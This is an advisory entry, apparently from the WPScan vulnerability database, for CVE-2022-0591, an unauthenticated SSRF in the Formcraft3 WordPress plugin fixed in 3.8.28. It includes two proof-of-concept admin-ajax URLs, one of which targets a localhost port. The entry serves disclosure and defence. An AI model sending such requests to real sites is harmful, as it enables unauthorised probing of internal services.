WordPress Plugin Vulnerabilities

Formcraft3 < 3.8.28 - Unauthenticated SSRF

Description

The plugin does not validate the URL parameter in the formcraft3_get AJAX action, leading to SSRF issues exploitable by unauthenticated users

Proof of Concept

https://example.com/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://wpscan.com
https://example.com/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://127.0.0.1:8181

Affects Plugins

formcraft3

Fixed in version 3.8.28

References

CVE

CVE-2022-0591

Classification

Type

SSRF

OWASP top 10

A1: Injection

CWE

CWE-918

Miscellaneous

Original Researcher

Brandon James Roldan

Submitter

Brandon James Roldan

Submitter twitter

tomorrowisnew_

Verified

Yes

WPVDB ID

b5303e63-d640-4178-9237-d0f524b13d47

Timeline

Publicly Published

2022-02-28 (about 1 years ago)

Added

2022-02-28 (about 1 years ago)

Last Updated

2022-04-08 (about 11 months ago)

Our Other Services

WPScan WordPress Security Plugin